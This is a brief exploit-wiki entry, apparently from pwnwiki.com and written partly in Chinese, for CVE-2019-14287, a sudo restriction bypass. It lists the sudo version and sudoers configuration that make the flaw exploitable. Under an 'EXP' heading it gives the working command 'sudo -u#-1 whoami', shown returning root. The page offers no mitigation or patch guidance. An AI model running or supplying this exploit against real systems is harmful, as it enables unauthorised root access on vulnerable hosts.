Loading
0

CVE-2019-14287 Sudo权限绕过漏洞

PWNWIK.COM

,

Info

CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions

利用要求

  • sudo版本低于v1.8.28
  • /etc/sudoers 配置要求如下(要求一组特定权限,不一定完全是下面的样子)
  • 示例

    <user> ALL=(ALL:!root) NOPASSWD: ALL

    EXP

    sudo -u#-1 whoami
    root
    

    pwnwiki.com